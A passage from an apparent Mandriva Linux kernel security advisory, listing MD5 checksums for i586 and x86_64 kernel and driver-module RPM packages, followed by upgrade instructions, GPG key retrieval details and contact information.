 0f89525306ac23ffe8a6549ee06f80af  2009.0/i586/slmodem-kernel-desktop586-latest-2.9.11-1.20081219.0.20080817.1mdv2009.0.i586.rpm
 a1e8eb87ddad077f17ba377275bb148e  2009.0/i586/slmodem-kernel-desktop-latest-2.9.11-1.20081219.0.20080817.1mdv2009.0.i586.rpm
 f9c0331a11335af72e5baaeb3fe088fa  2009.0/i586/slmodem-kernel-server-latest-2.9.11-1.20081219.0.20080817.1mdv2009.0.i586.rpm
 759426d604e0fe8606c8771c6877d240  2009.0/i586/squashfs-lzma-kernel-2.6.27.7-desktop-1mnb-3.3-5mdv2009.0.i586.rpm
 31ed9dd3b2248bff864fc79041b26690  2009.0/i586/squashfs-lzma-kernel-2.6.27.7-desktop586-1mnb-3.3-5mdv2009.0.i586.rpm
 f45489181219963888ae6677c33c521b  2009.0/i586/squashfs-lzma-kernel-2.6.27.7-server-1mnb-3.3-5mdv2009.0.i586.rpm
 a68cd2b4d8a889ea02f768ce7fa67689  2009.0/i586/squashfs-lzma-kernel-desktop586-latest-3.3-1.20081219.5mdv2009.0.i586.rpm
 0210d8b82d1eda73b55a4d0efda3ec8f  2009.0/i586/squashfs-lzma-kernel-desktop-latest-3.3-1.20081219.5mdv2009.0.i586.rpm
 f0548f93ee3809418a990834883a5ab6  2009.0/i586/squashfs-lzma-kernel-server-latest-3.3-1.20081219.5mdv2009.0.i586.rpm
 c511a214e1765a4ea10c8dd67d922b98  2009.0/i586/tp_smapi-kernel-2.6.27.7-desktop-1mnb-0.37-2mdv2009.0.i586.rpm
 457db7a562580d4b6a19eefb68c72f5e  2009.0/i586/tp_smapi-kernel-2.6.27.7-desktop586-1mnb-0.37-2mdv2009.0.i586.rpm
 f21da56339f476a100c64af2c9617d75  2009.0/i586/tp_smapi-kernel-2.6.27.7-server-1mnb-0.37-2mdv2009.0.i586.rpm
 c47972079b2921b76e7ad42fa96c51f6  2009.0/i586/tp_smapi-kernel-desktop586-latest-0.37-1.20081219.2mdv2009.0.i586.rpm
 5fcacfb4da87d0da6d4759fbc78bed0b  2009.0/i586/tp_smapi-kernel-desktop-latest-0.37-1.20081219.2mdv2009.0.i586.rpm
 3164c9640f4fa506788e53abb7ae2f7d  2009.0/i586/tp_smapi-kernel-server-latest-0.37-1.20081219.2mdv2009.0.i586.rpm
 2874770ccce9ab82bb9ebf0fa18a030a  2009.0/i586/vboxadd-kernel-2.6.27.7-desktop-1mnb-2.0.2-2mdv2009.0.i586.rpm
 0052642083bdb35af2b072097faa431f  2009.0/i586/vboxadd-kernel-2.6.27.7-desktop586-1mnb-2.0.2-2mdv2009.0.i586.rpm
 8b0371a7951610341445f701be800758  2009.0/i586/vboxadd-kernel-2.6.27.7-server-1mnb-2.0.2-2mdv2009.0.i586.rpm
 c54cd8a41ff85cbb00a2d1606eed67c8  2009.0/i586/vboxadd-kernel-desktop586-latest-2.0.2-1.20081219.2mdv2009.0.i586.rpm
 996fe2c0a1bc9b2d73ee1a5740a03c30  2009.0/i586/vboxadd-kernel-desktop-latest-2.0.2-1.20081219.2mdv2009.0.i586.rpm
 c4ff835db227d13dd7bfd408f821f6eb  2009.0/i586/vboxadd-kernel-server-latest-2.0.2-1.20081219.2mdv2009.0.i586.rpm
 9528c9685a53b6256ed237969f8720c5  2009.0/i586/vboxvfs-kernel-2.6.27.7-desktop-1mnb-2.0.2-2mdv2009.0.i586.rpm
 921530f050e988d7a8fefa8a9790c54f  2009.0/i586/vboxvfs-kernel-2.6.27.7-desktop586-1mnb-2.0.2-2mdv2009.0.i586.rpm
 8e358a1b58eefe7d8fe291c36b176ebd  2009.0/i586/vboxvfs-kernel-2.6.27.7-server-1mnb-2.0.2-2mdv2009.0.i586.rpm
 d1c4a43c7ebadcc10aeb120b8609709d  2009.0/i586/vboxvfs-kernel-desktop586-latest-2.0.2-1.20081219.2mdv2009.0.i586.rpm
 0e4c396fd2d51984affd9f442d1b137a  2009.0/i586/vboxvfs-kernel-desktop-latest-2.0.2-1.20081219.2mdv2009.0.i586.rpm
 abbbc5e47c181ae21aaf5fbf6fe17977  2009.0/i586/vboxvfs-kernel-server-latest-2.0.2-1.20081219.2mdv2009.0.i586.rpm
 6fb0bc2e272067dce4d8cb638d7895f3  2009.0/i586/vhba-kernel-2.6.27.7-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 4a1955d41c8aeabd6ef6a83e6fc57a06  2009.0/i586/vhba-kernel-2.6.27.7-desktop586-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 61f607fad7728e76f60e8d25000542cb  2009.0/i586/vhba-kernel-2.6.27.7-server-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 58116e411ac1cf40dd66fe81b6828a90  2009.0/i586/vhba-kernel-desktop586-latest-1.0.0-1.20081219.1.svn304.1mdv2009.0.i586.rpm
 99f80e775da656734640ef9e4d75ec06  2009.0/i586/vhba-kernel-desktop-latest-1.0.0-1.20081219.1.svn304.1mdv2009.0.i586.rpm
 d883510bc83e7cdc64dcd85c3176af66  2009.0/i586/vhba-kernel-server-latest-1.0.0-1.20081219.1.svn304.1mdv2009.0.i586.rpm
 30c966505a3ca84c0a391a0f919a89f9  2009.0/i586/virtualbox-kernel-2.6.27.7-desktop-1mnb-2.0.2-2mdv2009.0.i586.rpm
 d081e1f9f3c5ce94f84bda72de0d7fb4  2009.0/i586/virtualbox-kernel-2.6.27.7-desktop586-1mnb-2.0.2-2mdv2009.0.i586.rpm
 2528837842c81c76a49b05dd9ed7265f  2009.0/i586/virtualbox-kernel-2.6.27.7-server-1mnb-2.0.2-2mdv2009.0.i586.rpm
 a201e1149c0316f3dafab63d0494756b  2009.0/i586/virtualbox-kernel-desktop586-latest-2.0.2-1.20081219.2mdv2009.0.i586.rpm
 808e4637135b5e97186f6445b37dedc9  2009.0/i586/virtualbox-kernel-desktop-latest-2.0.2-1.20081219.2mdv2009.0.i586.rpm
 58f6bbedc166838d01b5d1ba0594175d  2009.0/i586/virtualbox-kernel-server-latest-2.0.2-1.20081219.2mdv2009.0.i586.rpm
 1a87a1c9758b2986b9bdf5f8eb4361e4  2009.0/i586/vpnclient-kernel-2.6.27.7-desktop-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 f8daa6658702f0da6f4b7e5ca30db35b  2009.0/i586/vpnclient-kernel-2.6.27.7-desktop586-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 1067322c7f0c434a0b9cb7ead007bd62  2009.0/i586/vpnclient-kernel-2.6.27.7-server-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 55e0d54d57a26a25cc2d587bd40e45be  2009.0/i586/vpnclient-kernel-desktop586-latest-4.8.01.0640-1.20081219.3mdv2009.0.i586.rpm
 2351287b921d2bc371639725c45b7a15  2009.0/i586/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20081219.3mdv2009.0.i586.rpm
 b28aacb2189b7580bd7a47abf050a5b9  2009.0/i586/vpnclient-kernel-server-latest-4.8.01.0640-1.20081219.3mdv2009.0.i586.rpm 
 a8032946dbdbcc38052a809fe6159d16  2009.0/SRPMS/kernel-2.6.27.7-1mnb2.src.rpm

 Mandriva Linux 2009.0/X86_64:
 faf1c33cf73c40eb1ea31504a71efb50  2009.0/x86_64/alsa_raoppcm-kernel-2.6.27.7-desktop-1mnb-0.5.1-2mdv2008.0.x86_64.rpm
 17bbab6010923f65cfaeef04980c6dd3  2009.0/x86_64/alsa_raoppcm-kernel-2.6.27.7-server-1mnb-0.5.1-2mdv2008.0.x86_64.rpm
 4e671af4df078d33af393710290575e5  2009.0/x86_64/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20081219.2mdv2008.0.x86_64.rpm
 3747125c0212d0698ba98ed251920748  2009.0/x86_64/alsa_raoppcm-kernel-server-latest-0.5.1-1.20081219.2mdv2008.0.x86_64.rpm
 6d3e225b98c2dd1d5d619f867812f6ae  2009.0/x86_64/drm-experimental-kernel-2.6.27.7-desktop-1mnb-2.3.0-2.20080912.1mdv2009.0.x86_64.rpm
 defe830e929c0c28a541532c02a8ba08  2009.0/x86_64/drm-experimental-kernel-2.6.27.7-server-1mnb-2.3.0-2.20080912.1mdv2009.0.x86_64.rpm
 b90415141d0735f3d54bf99fc1bea0fa  2009.0/x86_64/drm-experimental-kernel-desktop-latest-2.3.0-1.20081219.2.20080912.1mdv2009.0.x86_64.rpm
 579f917b536b6dcf385ea13e69a7b25c  2009.0/x86_64/drm-experimental-kernel-server-latest-2.3.0-1.20081219.2.20080912.1mdv2009.0.x86_64.rpm
 78d39d06f18f2f329d5f62a27f95673a  2009.0/x86_64/et131x-kernel-2.6.27.7-desktop-1mnb-1.2.3-7mdv2009.0.x86_64.rpm
 051e39cd16ebede46d5bbf2a8a323794  2009.0/x86_64/et131x-kernel-2.6.27.7-server-1mnb-1.2.3-7mdv2009.0.x86_64.rpm
 b495c8ed009b186f34b4cffdd4bc0a38  2009.0/x86_64/et131x-kernel-desktop-latest-1.2.3-1.20081219.7mdv2009.0.x86_64.rpm
 0b2d35eb493f296e99a99491ac095cf4  2009.0/x86_64/et131x-kernel-server-latest-1.2.3-1.20081219.7mdv2009.0.x86_64.rpm
 b7d04e6a354e32e5086c09f99f00ea72  2009.0/x86_64/fglrx-kernel-2.6.27.7-desktop-1mnb-8.522-3mdv2009.0.x86_64.rpm
 7d5934a4f4c1623d1dd4eb41ff12205e  2009.0/x86_64/fglrx-kernel-2.6.27.7-server-1mnb-8.522-3mdv2009.0.x86_64.rpm
 4cc95077a85ad76cb03f44b3b3a01a7d  2009.0/x86_64/fglrx-kernel-desktop-latest-8.522-1.20081219.3mdv2009.0.x86_64.rpm
 3d47569131d478000c3b63fb43afdb25  2009.0/x86_64/fglrx-kernel-server-latest-8.522-1.20081219.3mdv2009.0.x86_64.rpm
 c4eaa1da2aeaaa26fe1738c8bf96c6ca  2009.0/x86_64/gnbd-kernel-2.6.27.7-desktop-1mnb-2.03.07-2mdv2009.0.x86_64.rpm
 db0bce54df8201c8c0cc3aa7d205c728  2009.0/x86_64/gnbd-kernel-2.6.27.7-server-1mnb-2.03.07-2mdv2009.0.x86_64.rpm
 c9a39b41dff39386958aaea55a7e2c73  2009.0/x86_64/gnbd-kernel-desktop-latest-2.03.07-1.20081219.2mdv2009.0.x86_64.rpm
 33dc8b555e69046ec7ecf73851a42675  2009.0/x86_64/gnbd-kernel-server-latest-2.03.07-1.20081219.2mdv2009.0.x86_64.rpm
 45e003f0c6b9bd261a2c298d3dc35ddd  2009.0/x86_64/hsfmodem-kernel-2.6.27.7-desktop-1mnb-7.68.00.13-1mdv2009.0.x86_64.rpm
 9f7f6fed82156592a9f9582abc8644be  2009.0/x86_64/hsfmodem-kernel-2.6.27.7-server-1mnb-7.68.00.13-1mdv2009.0.x86_64.rpm
 f5a7e8452bdfc4da1c329b47c7f67a9a  2009.0/x86_64/hsfmodem-kernel-desktop-latest-7.68.00.13-1.20081219.1mdv2009.0.x86_64.rpm
 c6c9e585a1fd03435510bd473337cd8b  2009.0/x86_64/hsfmodem-kernel-server-latest-7.68.00.13-1.20081219.1mdv2009.0.x86_64.rpm
 d9ee8dfe4b5702c8d5773357a0e45146  2009.0/x86_64/hso-kernel-2.6.27.7-desktop-1mnb-1.2-2mdv2009.0.x86_64.rpm
 dbe6a1328ef3cfd10dcf18d1e2c88794  2009.0/x86_64/hso-kernel-2.6.27.7-server-1mnb-1.2-2mdv2009.0.x86_64.rpm
 d729dae8386e4c15a6902a6b6196b0dc  2009.0/x86_64/hso-kernel-desktop-latest-1.2-1.20081219.2mdv2009.0.x86_64.rpm
 b4817bc7fb5eaf296e8a2d2d8c7b2cc9  2009.0/x86_64/hso-kernel-server-latest-1.2-1.20081219.2mdv2009.0.x86_64.rpm
 f023472a39286f9f9d9abc27663f7dc6  2009.0/x86_64/iscsitarget-kernel-2.6.27.7-desktop-1mnb-0.4.16-4mdv2009.0.x86_64.rpm
 9eeb229d245c7496c0119bd6a4678ec7  2009.0/x86_64/iscsitarget-kernel-2.6.27.7-server-1mnb-0.4.16-4mdv2009.0.x86_64.rpm
 82660278799fa171d44e8013ad497636  2009.0/x86_64/iscsitarget-kernel-desktop-latest-0.4.16-1.20081219.4mdv2009.0.x86_64.rpm
 237cab475d0ec6624e350c184f1819c5  2009.0/x86_64/iscsitarget-kernel-server-latest-0.4.16-1.20081219.4mdv2009.0.x86_64.rpm
 c05d5c14b1eb3bd04ba598cecf607454  2009.0/x86_64/kernel-2.6.27.7-1mnb-1-1mnb2.x86_64.rpm
 e00469dae67d06afbc44f0ab68d18a39  2009.0/x86_64/kernel-desktop-2.6.27.7-1mnb-1-1mnb2.x86_64.rpm
 9f7263c793d0876216112e077621de99  2009.0/x86_64/kernel-desktop-devel-2.6.27.7-1mnb-1-1mnb2.x86_64.rpm
 e1819a646fce651f533ba92dc58c6b56  2009.0/x86_64/kernel-desktop-devel-latest-2.6.27.7-1mnb2.x86_64.rpm
 ec94dead43218a71f514d5637fd49ff3  2009.0/x86_64/kernel-desktop-latest-2.6.27.7-1mnb2.x86_64.rpm
 9c565a6339b901080a28c0982aed296d  2009.0/x86_64/kernel-doc-2.6.27.7-1mnb2.x86_64.rpm
 678b41232d88fff22e4d6c357890df1d  2009.0/x86_64/kernel-server-2.6.27.7-1mnb-1-1mnb2.x86_64.rpm
 d3a5dc8a60a8e4a20371c57978ee9b2d  2009.0/x86_64/kernel-server-devel-2.6.27.7-1mnb-1-1mnb2.x86_64.rpm
 c716603c983068ad305b09fe233f01c4  2009.0/x86_64/kernel-server-devel-latest-2.6.27.7-1mnb2.x86_64.rpm
 ed57901230ae582b40409db9f72ea69d  2009.0/x86_64/kernel-server-latest-2.6.27.7-1mnb2.x86_64.rpm
 bc439b8d27c136d2763afec6a4774a98  2009.0/x86_64/kernel-source-2.6.27.7-1mnb-1-1mnb2.x86_64.rpm
 910721e032e6f006f2cb1d5c1d006d48  2009.0/x86_64/kernel-source-latest-2.6.27.7-1mnb2.x86_64.rpm
 c92590337c19dac97b6b3b30f5d8dc18  2009.0/x86_64/kqemu-kernel-2.6.27.7-desktop-1mnb-1.4.0pre1-0.x86_64.rpm
 c58395cf4bc9987bfdeae2f0a898c51c  2009.0/x86_64/kqemu-kernel-2.6.27.7-server-1mnb-1.4.0pre1-0.x86_64.rpm
 c431450f65dafb43451873c21c874f25  2009.0/x86_64/kqemu-kernel-desktop-latest-1.4.0pre1-1.20081219.0.x86_64.rpm
 544d73df0aa751d9fbd4cd9d3ccfafee  2009.0/x86_64/kqemu-kernel-server-latest-1.4.0pre1-1.20081219.0.x86_64.rpm
 4114fa849759d4299a580f9ff5ffa04a  2009.0/x86_64/lirc-kernel-2.6.27.7-desktop-1mnb-0.8.3-4mdv2009.0.x86_64.rpm
 22eed1ace6822df18e9f7886fe9b8ca4  2009.0/x86_64/lirc-kernel-2.6.27.7-server-1mnb-0.8.3-4mdv2009.0.x86_64.rpm
 b682854ac84bf6cb2679199fa67fd35c  2009.0/x86_64/lirc-kernel-desktop-latest-0.8.3-1.20081219.4mdv2009.0.x86_64.rpm
 65fc298eeb259ca23b9f85779c079cb9  2009.0/x86_64/lirc-kernel-server-latest-0.8.3-1.20081219.4mdv2009.0.x86_64.rpm
 40867626ad14ebef69f0921000011c7b  2009.0/x86_64/lzma-kernel-2.6.27.7-desktop-1mnb-4.43-24mdv2009.0.x86_64.rpm
 75cff34e53fb646fdaa22c562f5d5b44  2009.0/x86_64/lzma-kernel-2.6.27.7-server-1mnb-4.43-24mdv2009.0.x86_64.rpm
 898d386b2a721f1a515647100a1005cd  2009.0/x86_64/lzma-kernel-desktop-latest-4.43-1.20081219.24mdv2009.0.x86_64.rpm
 c76a85c7ee0584ace41c4202735a243f  2009.0/x86_64/lzma-kernel-server-latest-4.43-1.20081219.24mdv2009.0.x86_64.rpm
 ec7b503f3f837d26ea23e6b1602fd267  2009.0/x86_64/madwifi-kernel-2.6.27.7-desktop-1mnb-0.9.4-3.r3835mdv2009.0.x86_64.rpm
 b5b0958ac9769249a980a84c061e7fc1  2009.0/x86_64/madwifi-kernel-2.6.27.7-server-1mnb-0.9.4-3.r3835mdv2009.0.x86_64.rpm
 d3b9d36a5651d4792a8b60806ac838db  2009.0/x86_64/madwifi-kernel-desktop-latest-0.9.4-1.20081219.3.r3835mdv2009.0.x86_64.rpm
 ae3f8a2a608c1cd1e4fddf852fdc3480  2009.0/x86_64/madwifi-kernel-server-latest-0.9.4-1.20081219.3.r3835mdv2009.0.x86_64.rpm
 0528a440481b9b2b9ddc99ff79c648bf  2009.0/x86_64/nvidia173-kernel-2.6.27.7-desktop-1mnb-173.14.12-4mdv2009.0.x86_64.rpm
 c90fe7acb9cbaaae20196caaff79a8d8  2009.0/x86_64/nvidia173-kernel-2.6.27.7-server-1mnb-173.14.12-4mdv2009.0.x86_64.rpm
 4e13c1fb230dee7c112c3483e382f29a  2009.0/x86_64/nvidia173-kernel-desktop-latest-173.14.12-1.20081219.4mdv2009.0.x86_64.rpm
 d7d40cfc43d2d103144a3c6d324b59ab  2009.0/x86_64/nvidia173-kernel-server-latest-173.14.12-1.20081219.4mdv2009.0.x86_64.rpm
 887c60f9e798fd05e48fc0c565beb48d  2009.0/x86_64/nvidia71xx-kernel-2.6.27.7-desktop-1mnb-71.86.06-5mdv2009.0.x86_64.rpm
 de892c7e9b55857656c3353140d3ac56  2009.0/x86_64/nvidia71xx-kernel-2.6.27.7-server-1mnb-71.86.06-5mdv2009.0.x86_64.rpm
 542f54d8ebe18d0750fd253941ab4080  2009.0/x86_64/nvidia71xx-kernel-desktop-latest-71.86.06-1.20081219.5mdv2009.0.x86_64.rpm
 1206267d92a44db3ef243c89ca5d7ccb  2009.0/x86_64/nvidia71xx-kernel-server-latest-71.86.06-1.20081219.5mdv2009.0.x86_64.rpm
 a5b45d2a206db28fdac2cf43b799a7b3  2009.0/x86_64/nvidia96xx-kernel-2.6.27.7-desktop-1mnb-96.43.07-5mdv2009.0.x86_64.rpm
 77251b263e0e1f24ea6901fa505d041b  2009.0/x86_64/nvidia96xx-kernel-2.6.27.7-server-1mnb-96.43.07-5mdv2009.0.x86_64.rpm
 ad3cb9c8ad434ee4bf8ee9344ab39541  2009.0/x86_64/nvidia96xx-kernel-desktop-latest-96.43.07-1.20081219.5mdv2009.0.x86_64.rpm
 c03d0a50920052cec2776592b900aa62  2009.0/x86_64/nvidia96xx-kernel-server-latest-96.43.07-1.20081219.5mdv2009.0.x86_64.rpm
 72fcfe8b50e61348fa2f86fbae96777e  2009.0/x86_64/nvidia-current-kernel-2.6.27.7-desktop-1mnb-177.70-2.3mdv2009.0.x86_64.rpm
 011f91cafe8d4f8ee6596c9ac801b3ac  2009.0/x86_64/nvidia-current-kernel-2.6.27.7-server-1mnb-177.70-2.3mdv2009.0.x86_64.rpm
 f01c913a66d210e77f0c969c80d28e74  2009.0/x86_64/nvidia-current-kernel-desktop-latest-177.70-1.20081219.2.3mdv2009.0.x86_64.rpm
 b781ffa73a4a66dfd29ce8ee9a527c93  2009.0/x86_64/nvidia-current-kernel-server-latest-177.70-1.20081219.2.3mdv2009.0.x86_64.rpm
 42f052c44c1cf2fa4e88d0c53e2c1a93  2009.0/x86_64/omfs-kernel-2.6.27.7-desktop-1mnb-0.8.0-1mdv2009.0.x86_64.rpm
 819e19569272ee560b12ab35d3a42007  2009.0/x86_64/omfs-kernel-2.6.27.7-server-1mnb-0.8.0-1mdv2009.0.x86_64.rpm
 64a6ad0b48a0aa6a38670640ca372dcd  2009.0/x86_64/omfs-kernel-desktop-latest-0.8.0-1.20081219.1mdv2009.0.x86_64.rpm
 e4d5ddb3007b110c1877289e2b999828  2009.0/x86_64/omfs-kernel-server-latest-0.8.0-1.20081219.1mdv2009.0.x86_64.rpm
 b502849b916ae55be1cc172b10d2475f  2009.0/x86_64/omnibook-kernel-2.6.27.7-desktop-1mnb-20080513-0.274.1mdv2009.0.x86_64.rpm
 afe99ab9d81e120df2fe0de7eb7cdc09  2009.0/x86_64/omnibook-kernel-2.6.27.7-server-1mnb-20080513-0.274.1mdv2009.0.x86_64.rpm
 c71ca0ee1ca7b4b2fcdd60ca66403430  2009.0/x86_64/omnibook-kernel-desktop-latest-20080513-1.20081219.0.274.1mdv2009.0.x86_64.rpm
 4a8564705978bada6a58849d0f007cb7  2009.0/x86_64/omnibook-kernel-server-latest-20080513-1.20081219.0.274.1mdv2009.0.x86_64.rpm
 3d46bb947d867bbb0a259667cfca6977  2009.0/x86_64/opencbm-kernel-2.6.27.7-desktop-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm
 3a8d6e24bef50504f7775f5b4c7ca917  2009.0/x86_64/opencbm-kernel-2.6.27.7-server-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm
 6ec5ada6b646e8e7f671099df67985ed  2009.0/x86_64/opencbm-kernel-desktop-latest-0.4.2a-1.20081219.1mdv2008.1.x86_64.rpm
 46405ca49ca8b5d8ee09d5a94614911d  2009.0/x86_64/opencbm-kernel-server-latest-0.4.2a-1.20081219.1mdv2008.1.x86_64.rpm
 9eccaa609fdd51e2cf67eaf06dc9e56b  2009.0/x86_64/ov51x-jpeg-kernel-2.6.27.7-desktop-1mnb-1.5.9-2mdv2009.0.x86_64.rpm
 60f2ed885c34a5979bd635d1c732d041  2009.0/x86_64/ov51x-jpeg-kernel-2.6.27.7-server-1mnb-1.5.9-2mdv2009.0.x86_64.rpm
 3a1471a27c9d786b6451e886c7ce1eaa  2009.0/x86_64/ov51x-jpeg-kernel-desktop-latest-1.5.9-1.20081219.2mdv2009.0.x86_64.rpm
 9d1f0b9f57b883d30b53b50df846656e  2009.0/x86_64/ov51x-jpeg-kernel-server-latest-1.5.9-1.20081219.2mdv2009.0.x86_64.rpm
 f0f95c5281737348708a60b7525ddf96  2009.0/x86_64/qc-usb-kernel-2.6.27.7-desktop-1mnb-0.6.6-6mdv2009.0.x86_64.rpm
 bbeec75811d38b38ba1c3984cfc57035  2009.0/x86_64/qc-usb-kernel-2.6.27.7-server-1mnb-0.6.6-6mdv2009.0.x86_64.rpm
 18432929c7ec70fe1ef18511c9ae99f9  2009.0/x86_64/qc-usb-kernel-desktop-latest-0.6.6-1.20081219.6mdv2009.0.x86_64.rpm
 850d91d632f990cc23eeb1b8a678f8e4  2009.0/x86_64/qc-usb-kernel-server-latest-0.6.6-1.20081219.6mdv2009.0.x86_64.rpm
 885e16b3860c8dbe4ffd1ced885dd710  2009.0/x86_64/rt2860-kernel-2.6.27.7-desktop-1mnb-1.7.0.0-2mdv2009.0.x86_64.rpm
 5754fdab1d5f061acac99fa82bb6080c  2009.0/x86_64/rt2860-kernel-2.6.27.7-server-1mnb-1.7.0.0-2mdv2009.0.x86_64.rpm
 5e5f7b7bea8287864e2370ed3a6ace9c  2009.0/x86_64/rt2860-kernel-desktop-latest-1.7.0.0-1.20081219.2mdv2009.0.x86_64.rpm
 5f65c5760b05e118df6628f7332fd6ba  2009.0/x86_64/rt2860-kernel-server-latest-1.7.0.0-1.20081219.2mdv2009.0.x86_64.rpm
 1a6346e521f927396aa84a1a8db53626  2009.0/x86_64/rt2870-kernel-2.6.27.7-desktop-1mnb-1.3.1.0-2mdv2009.0.x86_64.rpm
 3748da7a8606e7524b0ae21413affd22  2009.0/x86_64/rt2870-kernel-2.6.27.7-server-1mnb-1.3.1.0-2mdv2009.0.x86_64.rpm
 26844c7e3154de828baecdccca287548  2009.0/x86_64/rt2870-kernel-desktop-latest-1.3.1.0-1.20081219.2mdv2009.0.x86_64.rpm
 6420981625f4b45f31c3ad671a282a5d  2009.0/x86_64/rt2870-kernel-server-latest-1.3.1.0-1.20081219.2mdv2009.0.x86_64.rpm
 86bf971e9d175515a6f1f6f21af8c37f  2009.0/x86_64/rtl8187se-kernel-2.6.27.7-desktop-1mnb-1016.20080716-1.1mdv2009.0.x86_64.rpm
 fb37456eb8037bee9cfb66d7b099dbfc  2009.0/x86_64/rtl8187se-kernel-2.6.27.7-server-1mnb-1016.20080716-1.1mdv2009.0.x86_64.rpm
 1d1cd68321f8eb096054b84db3a2ed33  2009.0/x86_64/rtl8187se-kernel-desktop-latest-1016.20080716-1.20081219.1.1mdv2009.0.x86_64.rpm
 66f811cb4ee13024860507ece3e8678c  2009.0/x86_64/rtl8187se-kernel-server-latest-1016.20080716-1.20081219.1.1mdv2009.0.x86_64.rpm
 3607de70f59c6e1db479746c3c3f95f7  2009.0/x86_64/squashfs-lzma-kernel-2.6.27.7-desktop-1mnb-3.3-5mdv2009.0.x86_64.rpm
 03316e239836220b62b2771ccf326da8  2009.0/x86_64/squashfs-lzma-kernel-2.6.27.7-server-1mnb-3.3-5mdv2009.0.x86_64.rpm
 a5a974b70e877b98eaa60fd89def2973  2009.0/x86_64/squashfs-lzma-kernel-desktop-latest-3.3-1.20081219.5mdv2009.0.x86_64.rpm
 ec614229931548c0d2eb77b848c9fe0f  2009.0/x86_64/squashfs-lzma-kernel-server-latest-3.3-1.20081219.5mdv2009.0.x86_64.rpm
 9428e2c4c73602a1eafbfb70befbc38a  2009.0/x86_64/tp_smapi-kernel-2.6.27.7-desktop-1mnb-0.37-2mdv2009.0.x86_64.rpm
 bc835492de139ee359fe57ef34d8cb70  2009.0/x86_64/tp_smapi-kernel-2.6.27.7-server-1mnb-0.37-2mdv2009.0.x86_64.rpm
 619332d3441b8e85e4a0bd8a15cdbbfa  2009.0/x86_64/tp_smapi-kernel-desktop-latest-0.37-1.20081219.2mdv2009.0.x86_64.rpm
 fa722db997405a7b577aff12df2d2522  2009.0/x86_64/tp_smapi-kernel-server-latest-0.37-1.20081219.2mdv2009.0.x86_64.rpm
 8b7692a79d6782a14fa46d5c72421f60  2009.0/x86_64/vboxadd-kernel-2.6.27.7-desktop-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 a21e73f7a230e638e48cf03a20d56668  2009.0/x86_64/vboxadd-kernel-2.6.27.7-server-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 3711c1bbb6a3fa76285efd9e582ae23f  2009.0/x86_64/vboxadd-kernel-desktop-latest-2.0.2-1.20081219.2mdv2009.0.x86_64.rpm
 ce8d538c4acbf951b93310f8944f3b53  2009.0/x86_64/vboxadd-kernel-server-latest-2.0.2-1.20081219.2mdv2009.0.x86_64.rpm
 cc8fa0bc5c167cafbe2b7d9ecd6376fe  2009.0/x86_64/vboxvfs-kernel-2.6.27.7-desktop-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 6eb8d6ab270d06d349aac0915c02462f  2009.0/x86_64/vboxvfs-kernel-2.6.27.7-server-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 e645ca3353ae15e50a8b70b60a8e0688  2009.0/x86_64/vboxvfs-kernel-desktop-latest-2.0.2-1.20081219.2mdv2009.0.x86_64.rpm
 d57bd35354000c41b5b4d11bc987b0de  2009.0/x86_64/vboxvfs-kernel-server-latest-2.0.2-1.20081219.2mdv2009.0.x86_64.rpm
 d81270b1ef6475a93bd42e341af3eef4  2009.0/x86_64/vhba-kernel-2.6.27.7-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.x86_64.rpm
 ed2188753c2ccc7bfa9e2ea8b9d5719c  2009.0/x86_64/vhba-kernel-2.6.27.7-server-1mnb-1.0.0-1.svn304.1mdv2009.0.x86_64.rpm
 6ed21ef05ec70a828be6c9e8d7b21f88  2009.0/x86_64/vhba-kernel-desktop-latest-1.0.0-1.20081219.1.svn304.1mdv2009.0.x86_64.rpm
 b2cb44fc57a4f7577a059b0bd9e14688  2009.0/x86_64/vhba-kernel-server-latest-1.0.0-1.20081219.1.svn304.1mdv2009.0.x86_64.rpm
 5f9e8329b25a9169217e3661ad9f099b  2009.0/x86_64/virtualbox-kernel-2.6.27.7-desktop-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 c59bc9f98da0806fc8b3cd852a514009  2009.0/x86_64/virtualbox-kernel-2.6.27.7-server-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 42a9cdffbc9522859b037f40c3ec242a  2009.0/x86_64/virtualbox-kernel-desktop-latest-2.0.2-1.20081219.2mdv2009.0.x86_64.rpm
 01380fd206900a1e933612a85f3641e8  2009.0/x86_64/virtualbox-kernel-server-latest-2.0.2-1.20081219.2mdv2009.0.x86_64.rpm
 17befe23fade7c5e4739d015c860eb78  2009.0/x86_64/vpnclient-kernel-2.6.27.7-desktop-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm
 41458b77cad5afd298b9cf1b5a83e66e  2009.0/x86_64/vpnclient-kernel-2.6.27.7-server-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm
 bbf921c17e12310e68c845defee0bf1e  2009.0/x86_64/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20081219.3mdv2009.0.x86_64.rpm
 2d33248dfdff2984f3e33c449b6fac08  2009.0/x86_64/vpnclient-kernel-server-latest-4.8.01.0640-1.20081219.3mdv2009.0.x86_64.rpm 
 a8032946dbdbcc38052a809fe6159d16  2009.0/SRPMS/kernel-2.6.27.7-1mnb2.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
